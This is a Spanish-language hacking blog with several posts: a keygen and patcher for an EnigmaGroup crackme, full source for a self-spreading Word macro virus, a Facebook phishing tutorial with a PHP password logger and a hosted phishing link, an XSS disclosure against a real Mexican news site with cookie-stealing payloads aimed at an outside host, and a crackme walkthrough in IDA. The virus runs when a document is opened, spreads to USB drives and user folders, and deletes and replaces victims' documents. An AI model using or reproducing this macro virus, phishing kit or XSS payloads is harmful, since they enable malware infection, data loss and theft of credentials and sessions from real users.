viernes, 28 de julio de 2017

Codigo Fuente Del Keygen Para El Crackme 5 De Enigmagroup



Bueno aquí les dejo el código fuente de mi keygen para el crackme 5 de EnigmaGroup


Tipo De Programa: Keygen

Hecho Por: Flamer

Reto: Crackme 5 De EnigmaGroup

Pagina Del Reto: https://www.enigmagroup.org/pages/cracking

Tutorial: Parte 1 y Parte 2

Dificultad: Media

Lenguaje: Visual Basic.Net

Descarga: https://www.mediafire.com/?c04vb4sa23fzvq4

Codigo:


Option Explicit On

Public Class Form1
    Private Declare Function mciExecute Lib "winmm.dll" (ByVal lpstrCommand As String) As Long
    Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Int32, ByVal hwndCallback As Int32) As Long

    Dim tem As String = Environ("temp") & "\musika.mp3"

    Private Sub Form1_FormClosing(sender As Object, e As System.Windows.Forms.FormClosingEventArgs) Handles Me.FormClosing
        On Error Resume Next
        mciSendString("close MP3", "", 0, 0)
        Kill(tem)
    End Sub


    Private Sub Form1_Load(sender As System.Object, e As System.EventArgs) Handles MyBase.Load
        On Error Resume Next
        Dim fecha As String = Now.Date
        Dim d, c As Integer
        Dim clave As String = ""
        Dim mciret As Long


        System.IO.File.WriteAllBytes(tem, My.Resources._1)

        mciSendString("close all", "", 0, 0)
        mciret = mciSendString("open " & tem & " type MPEGVideo Alias MP3", "", 0, 0)
        If mciret <> 0 Then
            MsgBox("Error abriendo MP3")
        Else
            mciExecute("Play MP3")
        End If


        c = 1

        For x = 1 To Len(fecha)
            If Mid(fecha, x, 1) = "/" Then
                clave = clave & "0"
                c = c - 1
            Else
                d = CInt(Mid(fecha, x, 1))
                d = d * 45
                If d = 0 Then
                    clave = clave & "2D"
                Else
                    clave = clave & Hex(d)
                End If
            End If

            If c = 2 Then
                clave = clave & "-"
                c = 1
            Else
                c = c + 1
            End If
        Next
        serial.Text = Mid(clave, 1, Len(clave) - 1)


    End Sub
    Private Sub Button2_Click(sender As System.Object, e As System.EventArgs) Handles Button2.Click
        Dim cd As New OpenFileDialog
        Dim nom As String = ""
        Dim code As String = ""
        Dim r As String = "frmSerial" & Chr(0) & Chr(13) & Chr(1) & Chr(20) & Chr(0) & "Program Registration"

        With cd
            cd.Filter = "file exe|*.exe"
            cd.Title = "Selecciona el crackme 5"
            cd.ShowDialog()
            nom = cd.FileName
        End With

        If nom <> "" Then
            code = Space(34)
            FileOpen(1, nom, OpenMode.Binary)
            Seek(1, 4929)
            FileGet(1, code)
            FileClose(1)

            If code = r Then
                FileOpen(2, nom, OpenMode.Binary)
                Seek(2, 13433)
                FilePut(2, Chr(6))
                Seek(2, 13619)
                FilePut(2, Chr(6))
                FileClose(2)
                MsgBox("Crackme 5 De EnigmaGroup Crackeado, Ahora ya Acepta 6 Digitos")
            Else
                MsgBox("Error Crackme Incorrecto")
            End If
        Else
            MsgBox("No Selecciono Ningun Archivo", MsgBoxStyle.Exclamation, "Aviso De Error")
        End If
    End Sub

    Private Sub serial_Click(sender As System.Object, e As System.EventArgs) Handles serial.Click

    End Sub
End Class



Saludos Flamer y espero les halla gustado


jueves, 29 de junio de 2017

Crear un Virus De Macro Nuevo Método

Esta ves vengo con un código de macro o mejor dicho un virus de macro, con un método diferente de propagación este inventado por mi, digo por mi por que no loe visto en otro sitio.

este virus es similar a un ransomware pero este no pide dinero o rescate, solo pide que habiliten las macros para poder recuperar el archivo y poder visualizarlo.

primeramente abriremos el word y escribiremos el siguiente texto en el documento


ALERTA DE SEGURIDAD

Tu archivo a sido encriptado por por el virus Fear scary  , para desencriptarlo tienes que habilitar las macros y enseguida se mostrara


:::...CodeDocumentWord...:::

y se vera algo así


siguiente pasa sera aguardarlo con la extencion .doc





Después aremos lo siguiente daremos clic en la pestaña programador




luego daremos clic en visual basic


y se mostrara la siguiente ventana



y empezaremos a teclear el siguiente código

Option Explicit

Dim yo As String
Private Sub Document_open()
Randomize
Dim tem As String
Dim c, doc As String
Dim x As Long
Dim word, hoja As Object
Dim code() As String

yo = Me.Path & "\" & Me.Name
tem = Environ("temp") & "\" & CStr(CInt((1000 - 100 + 1) * Rnd + 100)) & ".doc"


primero declaramos la variable yo como global con el comando dim y las variables tem,c,doc,x,word,hoja,code como locales para la función open.

a la variable yo le asignaremos la ruta del documento abierto y a la variable tem le asignamos la ruta de la carpeta temporal del sistema y agregando un nombre al azar del 100 al 1000 y con la extensión doc, esto con la intención de que cree un documento en la carpeta temporal con dicho nombre 

Me.Select
code = Split(Me.Application.Selection.Text, ":::...CodeDocumentWord...:::")

después con el comando Me asemos referencia al archivo abierto y con la función Select seleccionamos su contenido.

ahora con la instrucción Me.Application.Selection.Text extraemos el contenido del documento ya que lo seleccionamos en la instrucción anterior y con el comando Split dividimos su contenido en partes usando la palabra :::...CodeDocumentWord...::: como delimitador y el contenido es almacenado en el vector code.

If UBound(code) = 1 Then
   c = Trim(code(1))
   c = Replace(c, Chr(13), "")
   If c <> "" Then
      For x = 1 To Len(c) Step 2
         doc = doc & Chr(CInt("&H" & Mid(c, x, 2)))
      Next
        
      Open tem For Binary As #1
         Put #1, , doc
      Close #1
      
      Set word = CreateObject("word.application")
      Set hoja = word.Documents.Open(tem)
      word.Visible = True
      word.ShowMe
      Me.Application.Visible = False
   End If
End If

en la siguiente linea pregunto con el comando if si el vector tiene 2 posiciones la 0 que es la que debe contener el mensaje y la 1 donde contiene el documento encriptado, si tiene posición 1 entrara al if y con el comando trim quitara los espacios en blanco y con el comando replace quito los enter que su valor ascii es el 13.

luego vuelvo a preguntar si la variable c contiene algún valor o sea el código encriptado, y si es así este pasara hacer leído en un ciclo for, para después crearlo en un archivo y guardado en la dirección que contiene la variable tem, acto seguido es pasar a visualizarlo, para eso se crea un objecto word y un objecto hoja y es abierto el archivo nuevo con la instrucción word.Documents.Open y con la instrucción word.visible = True se hace visible el documento.

y para que el usuario no siga viendo el archivo infectado lo hacemos invisible con la instrucción Me.Application.Visible = False

lo siguiente es mandar llamar la función infectar 

Call infectar

dentro de ella encontramos esto

Function infectar()
Dim desktop, Document As String
Dim fso, dis, d As Object

Set fso = CreateObject("scripting.filesystemobject")
Set dis = fso.drives


desktop = Environ("userprofile") & "\desktop"
Document = Environ("userprofile") & "\Documents"

For Each d In dis
   If d.drivetype = 1 Then
      Call Encriptar(d)
   End If
Next

Call Encriptar(desktop)
Call Encriptar(Document)


End Function

como vemos declara las variables con el comando dim y crea dos objectos uno llamado fso y otro dis
ala variable desktop se le asigna el valor de la ruta del escritorio y ala variable Document se le asigna la ruta de mis documentos.

como vemos en seguida tenemos un ciclo que recorre todos los drives o mejor dicho los discos que contiene la computadora en ese momento conectados pero con la excepción que solo buscara los discos extraìbles que vendrían siendo las usb, esto para poderlas infectar llamando la función encriptar, la cual contiene el siguiente código

Function Encriptar(ruta)
   Dim carpeta, listfiles, listfolders, f, fso As Object
   Set fso = CreateObject("scripting.filesystemobject")
      
   Set carpeta = fso.getfolder(ruta)
   Set listfolders = carpeta.subfolders
   Set listfiles = carpeta.Files
   
   For Each f In listfiles
      If Mid(f.Path, Len(f.Path) - 3, 4) = ".doc" Or Mid(f.Path, Len(f.Path) - 3, 4) = "docx" Then
         If f.Path <> yo And f.Attributes <> 34 Then
             Call leerarchivo(f.Path)
         End If
      End If
   Next

   For Each f In listfolders
    Call Encriptar(f.Path)
   Next
End Function

esta función toma la ruta que se le asigno primero y busca todos los archivos "docx" y "doc" y si estos son encontrados son enviado a otra función llamada leerarchivo, con la excepcion de que no sea el mismo documento y que no tenga como atributo el valor 34, al terminar de revisar la carpeta donde se encuentra pregunta por cada una de las sub-carpetas que contiene y si tiene alguna sub-carpeta se manda llamar ella misma y sigue asiendo lo mismo recorriendo todos los sub-directorios de una unidad y revisando si contiene los archivos mencionados anteriormente.

después tenemos la función leerarchivo

Function leerarchivo(ruta)

Dim bites As String
Dim hexa, code As String
Dim h As String
Dim x As Long

   bites = Space(FileLen(ruta))

   Open ruta For Binary As #2
      Get #2, , bites
   Close #2

      
   If InStr(1, bites, "ALERTA DE SEGURIDAD") = 0 or InStr(1, bites, "Fear scary") = 0 or InStr(1, bites, ":::...CodeDocumentWord...:::") = 0 Then

      For x = 1 To Len(bites)
         h = Hex(Asc(Mid(bites, x, 1)))
         If Len(h) = 1 Then
            h = "0" & h
         End If
         hexa = hexa & h
      Next
   
      Kill ruta
      ruta = Replace(ruta, ".docx", ".doc")
      Me.Select
      code = Me.Application.Selection.Text
      
      Me.Application.Selection.Text = "ALERTA DE SEGURIDAD" & vbCrLf & "Tu archivo a sido encriptado por por el virus Fear scary  , para desencriptarlo tienes que habilitar las macros y enseguida se mostrara" & vbCrLf & vbCrLf & ":::...CodeDocumentWord...:::" & vbCrLf & vbCrLf & hexa
      Me.SaveAs ruta
      
      Me.Application.Selection.Text = code
      Me.SaveAs yo
      
   End If

End Function

lo que hace esta funcion es leer cada archivo que se le a enviado en forma binaria con el comando open y ya que es leído pregunta si en este se encuentran las palabras "ALERTA DE SEGURIDAD", "Fear scary",":::...CodeDocumentWord...:::" y si se encuentran las 3 quiere desir que el archivo esta infectado pero si solo se encuentran 1 o 2, quiere decir que no y pasara a leer cada byte del archivo y convertirlo a su valor hexa-decimal y almacenarlo en la variable hexa, para después crear una copia del archivo infectado e ingresar los valores hexa-decimales  almacenados en hexa

Nota: yo solo convertí los bytes en a su valor hexadecimal pero pueden ser encriptados, creando una función que lo haga, yo solo lo hice así para que se entendiera un poco

aqui el codigo completo

Option Explicit

Dim yo As String
Private Sub Document_open()
Randomize
Dim tem As String
Dim c, doc As String
Dim x As Long
Dim word, hoja As Object
Dim code() As String

yo = Me.Path & "\" & Me.Name
tem = Environ("temp") & "\" & CStr(CInt((1000 - 100 + 1) * Rnd + 100)) & ".doc"

Me.Select
code = Split(Me.Application.Selection.Text, ":::...CodeDocumentWord...:::")

If UBound(code) = 1 Then
   c = Trim(code(1))
   c = Replace(c, Chr(13), "")
   If c <> "" Then
      For x = 1 To Len(c) Step 2
         doc = doc & Chr(CInt("&H" & Mid(c, x, 2)))
      Next
        
      Open tem For Binary As #1
         Put #1, , doc
      Close #1
      
      Set word = CreateObject("word.application")
      Set hoja = word.Documents.Open(tem)
      word.Visible = True
      word.ShowMe
      Me.Application.Visible = False
   End If
End If
Call infectar
 Me.SaveAs yo
 Me.Application.Quit
End Sub


Function infectar()
Dim desktop, Document As String
Dim fso, dis, d As Object

Set fso = CreateObject("scripting.filesystemobject")
Set dis = fso.drives


desktop = Environ("userprofile") & "\desktop"
Document = Environ("userprofile") & "\Documents"

For Each d In dis
   If d.drivetype = 1 Then
      Call Encriptar(d)
   End If
Next

Call Encriptar(desktop)
Call Encriptar(Document)

End Function

Function Encriptar(ruta)
   Dim carpeta, listfiles, listfolders, f, fso As Object
   Set fso = CreateObject("scripting.filesystemobject")
      
   Set carpeta = fso.getfolder(ruta)
   Set listfolders = carpeta.subfolders
   Set listfiles = carpeta.Files
   
   For Each f In listfiles
      If Mid(f.Path, Len(f.Path) - 3, 4) = ".doc" Or Mid(f.Path, Len(f.Path) - 3, 4) = "docx" Then
         If f.Path <> yo And f.Attributes <> 34 Then
             Call leerarchivo(f.Path)
         End If
      End If
   Next

   For Each f In listfolders
    Call Encriptar(f.Path)
   Next
End Function



Function leerarchivo(ruta)

Dim bites As String
Dim hexa, code As String
Dim h As String
Dim x As Long

bites = Space(FileLen(ruta))

   Open ruta For Binary As #2
      Get #2, , bites
   Close #2
     
   If InStr(1, bites, "ALERTA DE SEGURIDAD") = 0 or InStr(1, bites, "Fear scary") = 0 or InStr(1, bites, ":::...CodeDocumentWord...:::") = 0 Then

      For x = 1 To Len(bites)
         h = Hex(Asc(Mid(bites, x, 1)))
         If Len(h) = 1 Then
            h = "0" & h
         End If
         hexa = hexa & h
      Next
   
      Kill ruta
      ruta = Replace(ruta, ".docx", ".doc")
      Me.Select
      code = Me.Application.Selection.Text
      
      Me.Application.Selection.Text = "ALERTA DE SEGURIDAD" & vbCrLf & "Tu archivo a sido encriptado por por el virus Fear scary  , para desencriptarlo tienes que habilitar las macros y enseguida se mostrara" & vbCrLf & vbCrLf & ":::...CodeDocumentWord...:::" & vbCrLf & vbCrLf & hexa
      Me.SaveAs ruta
      
      Me.Application.Selection.Text = code
      Me.SaveAs yo
      
   End If
End Function


si quieren dificultarle la vida al que quiera he charle un vistazo a su macro pueden ponerle clave, dando clic en herramientas y luego en



y en la siguiente ventana dan clic en protección y palomean la siguiente opción e ingresan la clave



bueno creo que eso es todo por hoy y espero le sirva a alguien y recuerden que lo expuesto aquí son con fines educativos y lo hago para que vean que hay métodos de infección que no sean visto, yo no lo e visto en otra parte


Saludos Flamer


lunes, 5 de junio de 2017

Hackear Facebook Creando Un Phishing

Hoy veremos como crear un phishing, para engañar ala victima y obtener su contraseña de facebook, pero varios de ustedes se preguntaran que es un phishing pues les explico de una manera simple.

un phishing es una pagina falsa, idéntica ala verdadera que en este caso vendría siendo idéntica a la de facebook y donde el usuario creerá que es la verdadera y como es común pondrá sus datos como es correo y contraseña y dichos datos serán enviados a nosotros, espero halla quedado claro y para los que quieren saber mas aquí les dejo el link de wikipedia: https://es.wikipedia.org/wiki/Phishing

bueno para empezar nos iremos a la pagina de facebook que es esta: https://www.facebook.com/ y ya que estemos aquí daremos clic derecho y ver código fuente así


después copiaremos el código html


luego abriremos el notepad o bloc de notas y pegaremos el código hay, después pasaremos a aguardarlo con la extencion php y como archivo UTF-8


ya que lo aguardaron pasaremos a abrirlo con el programa llamado notepad++ si no lo tienen lo pueden descargar desde aquí https://notepad-plus-plus.org/download/v7.4.1.html

y luego borraremos todas las etiquetas y códigos script que se encuentren dentro del código html, para los que no saben es todo aquello que se encuentra dentro de estas etiquetas <script>  y  </script>
ejemplo:



luego daremos clic en buscar y buscaremos la cadena siguiente "/ y la remplazaremos por "http://www.facebook.com/ como se ve en la imagen


y remplazaremos todas las cadenas, esto es por si el usuario da clic en un hipervinculo de nuestra pagina falsa y no le marque error.

ahora buscaremos la palabra login.php como se ve en la imagen


y remplazaremos la propiedad action por nuestra pagina que capturara los datos, yo le llamare "log.php" y como estoy en mi pc su url o dirección sera "http://localhost/log.php" y es la que pondré en la propiedad action y quedara así


ya con esto aguardamos los cambios y el código que contendrá el archivo log.php sera el siguiente


<html>
<head><title></title>
</head>
<body>
<?php
$user = $_POST['email'];
$pass = $_POST['pass'];
$file = fopen("loger.txt","a");
fwrite($file,"El correo es: " . $user . "\r\n");
fwrite($file,"La Contraseña es:" . $pass . "\r\n");
fwrite($file,"==========================================================================================" . "\r\n");
fclose($file);
header("Location: https://www.facebook.com/login.php");
?>
</body>
</html>


bueno después de esto solo que da montar nuestra pagina falsa, yo ya la monte en mi localhost y si funciono y para que ustedes la vean la monte en un servidor gratuito y aquí esta

https://practicascocacola.000webhostapp.com/facebook.php

Saludos Flamer y no introduzcan datos verdaderos  jajajaj los hackeare



viernes, 12 de mayo de 2017

Esteganografía Ocultar Archivos Que Se Encuentran Dentro De Un Rar

Recientemente a cavo de ver este hilo en el foro
https://foro.elhacker.net/bugs_y_exploits/rar_file_missing_esteganografia_en_un_rar-t381789.0.html

y como los link están caídos se me bino ala mente por que no explicar algo similar, pero les aclaro no se si lo que explicare se asemeja al tema ya que hay se habla de un programa y a lo mejor el programa lo hace mejor que yo pero en fin les explico lo que se.

primero empesemos por saber que es esteganografia y por lo poco que se se trata del arte de esconder objectos dentro de otros, pero para una explicación mejor aquí wikipedia es la maestra.
https://es.wikipedia.org/wiki/Esteganograf%C3%ADa

bueno ya que tienen una idea de que es, pasaremos ala practica y lo que pasaremos hacer es esconder un archivo que se encuentra dentro de un rar.

para empezar yo cree dos archivo rar estos




el primero llamado 1.rar que contiene un archivo de texto llamado vvvv.txt



el segundo llamado 2.rar que contiene 2 archivos adentro uno llamado vvvv.txt y otro llamado sss.vbs


bueno lo que aremos es desaparecer el archivo sss.vbs que se encuentra en el archivo 2.rar y si se preguntan por que 2 archivos rar, es solo para compararlos.

ahora abriremos los archivos rar con un editor hexadecimal, yo usare como siempre hxd hex editor y al abrir el archivo 1.rar  muestra lo siguiente


como ven los últimos bites están seleccionados y ¿que son esos bites? pues son los que marcan el final del archivo rar, así que veremos el archivo 2.rar y muestra lo siguiente


si se fijan un poco al final se repiten los mismos bites del archivo 1.rar, ahora lo que haremos para desaparecer el archivo sss.vbs es marcar el final del archivo mas arriba, para eso copiamos los bites que se encuentran al final C4 3D 7B 00 40 07 00 y los pegamos en la zona que esta marcada con rojo
quedando algo asi


ahora si aguardamos los cambios y abrimos el archivo 2.rar se muestra lo siguiente


y guala soy un juacker desapareció el archivo sss.vbs y al abrirlo no marca ningún error y al descomprimir tampoco y para recuperar el archivo solo tienen que poner los bites que remplazamos por los que estaban y pueden usar el mismo rar para almacenarlos solo intercambienlos no les marcara error, los de arriba para abajo y los de abajo para arriba

Saludos Flamer


miércoles, 10 de mayo de 2017

Vulnerabilidad Xss En La Pagina De El Debate De Culiacan

Hace días en el foro de undercode me encontré con este tema:
https://underc0de.org/foro/hacking-showoff/(xss)-anonymousmx-com/

El cual un compañero expone una vulnerabilidad en la pagina de anonymous mexico, el cual es una vulnerabilidad XSS y que es eso aquí un enlace de wikipedia que explica que es:
https://es.wikipedia.org/wiki/Cross-site_scripting

bueno ha si que sabiendo que es lo que expuso el compañero medí ala tarea de buscar una yo por mi cuenta y no tuve que ir tan lejos, ya que en mi localidad se encuentra una pagina dedicada al periodismo llamada El Debate de Culiacan y testeando un poco la pagina medí cuenta que es vulnerable a ataques XSS, pero no es tan grave al parecer.

Yo al encontrar este fallo envié un mail al administrador de dicha pagina, y ya tengo 4 días sin respuesta alguna, así que decidí mostrarlo qui en mi blog.

La pagina del debate de culiacan es esta:
http://www.debate.com.mx/

y para encontrar esta falla se irán a este link

https://www.debate.com.mx/buscar.html?search=AQUÍ LA INYECCIÓN

Este link es el resultado de realizar una búsqueda en la pagina, así que para realizar una inyección insertaremos comandos HTML los cuales son interpretados por la pagina, cosa que no debería de ser

así que veremos que podemos hacer, primero creare un botón en ella así

https://www.debate.com.mx/buscar.html?search=%3Cinput%20type=button%20value=%27HackeadoByFlamer%27%3E

y el resultado es este



como ven si lo creo, ahora subiremos el nivel, inyectaremos un bloque de código de javascript a ver si se logra y lo que hará dicho bloque sera mandar un mensaje al presionar el botón que creamos, seria así

https://www.debate.com.mx/buscar.html?search=<input type='button' id='100' value='Hackeado_Por_Flamer' onclick='msj()'><script>function msj(){alert(document.getElementById('100').value)}</script>

y nos muestra lo siguiente



y ahora si queremos sacar las cookies al presionar el botón seria asi

https://www.debate.com.mx/buscar.html?search=<input type='button' id='100' value='Hackeado_Por_Flamer' onclick='msj()'><script>function msj(){alert('document.cookie')}</script>

Aclaro que document.cookie debe de ir entre comillas simples por que del otro modo el navegador me marca error, ya detecta un ataque XSS

y el resultado es el siguiente


bueno y dirán de que serviría un ataque de estos si no tengo acceso al servidor ya que javascript se ejecuta en el cliente, pues les comento si fuera una pagina donde se tendría que loguear el usuario como tipo facebook, twitter o simplemente el foro del hacker.net, para hackear al usuario y entrar a su cuenta necesitamos las cookies y para eso el atacante crearía un script que las enviara cuando este diera clic en el enlace.

y se preguntaran como si en el ejemplo anterior ocupábamos darle clic al botón para obtener las cookies, pues para ejecutar un script en esta pagina sin dar clic en el boton seria asi

https://www.debate.com.mx/buscar.html?search=<script>{alert('document.cookie')}</script>

y con esto ya obtenemos las cookies, ahora se preguntaran para enviarlas, pues ami se me ocurre pasarlas por la url y seria algo así

Nota: el siguiente link no funciona

https://www.debate.com.mx/buscar.html?search=<script>{window.location.href='http://webdelhacker.net/loger.php?data=+document.cookie'}</script>

y loger.php tendría que recibir con el comando $_GET en php

y se preguntaran por que no funciona, pues párese que es la pagina del debate que no procesa los : el + y las comillas simples, ya que si nos fijamos en el código sebe lo siguiente


bueno no se que mas decir, hay esta la pagina y si se pueden crear script se pueden hacer varias cosas solo falta imaginación

Saludos Flamer y lo expuesto aquí son con fines educativos no me hago responsable si ala pagina le sucede algo por dar ideas o incitar alas personas


viernes, 5 de mayo de 2017

Resolviendo El Crackme 3 De EnigmaGroup Con IDA-Pro

Anteriormente había dicho que no haría tutorial de el crackme 3 de EnigmaGroup pero como trato de aprender IDA are una excepción y resolveré el crackme con IDA-Pro.

bueno si no tienen el crackme lo pueden descargar desde su pagina oficial esta:

https://www.enigmagroup.org/pages/cracking

ahora ya que descargaron el crackme pasaremos abrirlo con IDA, pero una cosa muy importante antes de intentar crackear un programa con IDA deben de saber si el programa o crackme es de 32 o 64 bits.

una solución para saber si el crackme es de 32 o 64 bit es abrirlo con el RDG Detector, así que ami al abrirlo con el me sale la siguiente imagen


y como ven donde esta marcado de rojo dice que es de 32 bits, asi que al abrirlo con IDA lo abriremos con IDA 32 bits que es esta.


para los que no saben IDA te instala 2 versiones por eso es muy importante saber que versión es el programa que queremos reversear.

A continuación nos aparecerá una pantalla la cual daremos clic en New



acto seguido ubicaremos el crackme 3 de enigma group, el cual yo lo tengo en la carpeta descargas


después damos clic en abrir y se abrirá la siguiente ventana donde seleccionamos la primera opción y damos clic en OK


bueno ya con esto tendremos el crackme abierto y listo para crackear así que primero buscaremos en las apis que utiliza el crackme para comparar los seriales y para eso nos iremos ala pestaña Imports y nos muestra lo siguiente


Como ven utiliza la misma api que en los crackmes anteriores.

bueno una cosa muy importante no se asusten ya que IDA es mas extenso y laborioso que ollydbg, ya que tiene mas instrucciones pero poco a poco iremos aprendiendo ya que yo todavía no lo domino y una de las cosas que extraño de el ollydbg que no distingo las instrucciones de otras ya que en el desensamblado que mas adelante les presentare, todas las instrucciones tienen el mismo color y no se distinguen a simple vista tengo que seleccionarlas y para eso ando fijando mucho la vista en fin ojala en versiones futuras mejoren eso.

ahora para no andar buscando en el desensamblado la api  __vbaVarTstEq aremos lo siguiente, nos iremos a la pestaña IDA View-A  que es la que nos muestra el desensamblado del programa


y como verán es muy distinto a el ollydbg pero como dije no se asusten que todo tiene remedio, bueno ya que estamos aqui nos iremos al icono siguiente


también pueden dar clic en la pestaña Search y buscar la opción Text la cual tiene el mismo icono que seleccionamos.

a continuación muestra la siguiente ventana


y escribimos el nombre de la api que deseamos encontrar y marcamos las mismas instrucciones y al ultimo presionamos OK

después de esto se abrirá una nueva pestaña donde nos muestra las direcciones donde se utiliza dicha api, así que yo ubique el call donde se asen las comparaciones de las cadenas el cual para eso fui analizando cada resultado que me dio la búsqueda y es este

para irnos a esa dirección solo damos clic sobre el y nos redirige hasta esta ubicación



Asi que ya tenemos ubicado donde compara las string, asi que para eso pondremos un break-point y tracearemos con F7 igual que ollydbg y para eso solo damos clic al circulo azul de esa linea hasta que se haga rojo y nos marque la linea asi


y ahora pasaremos a ejecutar la aplicación con F9 y si les aparece la siguiente ventana seleccionamos la siguiente opción



Damos OK y por ultimo volvemos a presionar F9

Ahora si nos aparece la ventana del crackme y así que ingresaremos la contraseña que sea, yo ingresare "123456" y presionamos el botón submit



al presionar el botón el programa se detiene justo en el break-point que pusimos este


ahora presionaremos F7 para ingresar en el CALL e ir revisando la pila o stack

Nota: para ir revisando que es lo que se encuentra en el stack iremos dando clic sobre las instrucciones que digan Debug como estas



y el contenido es mostrado en la sección del DUMP

Bueno asi que al tracear con F7 e llegado a la siguiente sección


y al pararme en esta linea reviso el stack o pila y veo que me muestra lo siguiente


y presiono sobre la primera y me muestra lo siguiente en el Dump


ahora presiono la segunda


y guala la clave es "Debug54321" y al ingresar esa clave en el crackme me muestra lo siguiente




Bueno eso es todo amigos espero les halla gustado y perdón si no lo hice en vídeo ya que hay usuarios que me piden los vídeos pero se me hace mas cómodo ami escribir

Saludos Flamer



miércoles, 29 de marzo de 2017

Facebook Gratis En Tu Movil Android y PC

Hoy veremos como tener facebook gratis desde nuestro móvil android, este método creo que sirve solo en mexico, desconozco si en otros países funciona.

Primero explicare como hacerlo en el móvil

Primeramente prenderé los datos del móvil dirigiéndome a configuraciones


Después nos iremos a uso de datos



Ya dentro de uso de datos presionamos el botón No


Y nos arrojara el siguiente mensaje, el cual le daremos aceptar



Y observaran que cambia de color el botón y de No a Si




Ya con esto tendremos los datos encendidos, ahora pasaremos a irnos al navegador


Al abrirlo me redirige a la pagina de telcel diciéndome que no tengo saldo


Si ustedes lo intentan, háganlo sin saldo ya que se los consumirá.

ahora pasaremos a teclear esto en la barra de direcciones del navegador

Free.facebook.com

Y nos mandara ala pagina del facebook gratis


Como ven tenemos facebook gratis, así que pasaremos a loguearnos y ami me mostrara lo siguiente


Aclaro este facebook es modo texto, esto quiere decir que no pueden ver fotos y vídeos, fotos muestra una que otra pero vídeos olvídense para eso tiene que tener un plan, pero si pueden enviar mensajes, y hacer todo lo demás.

Aquí pueden ver como hacerlo desde la computadora

https://www.youtube.com/watch?v=ABw6_jSoIkI&feature=youtu.be


Bueno eso es todo espero que les halla gustado

Saludos Flamer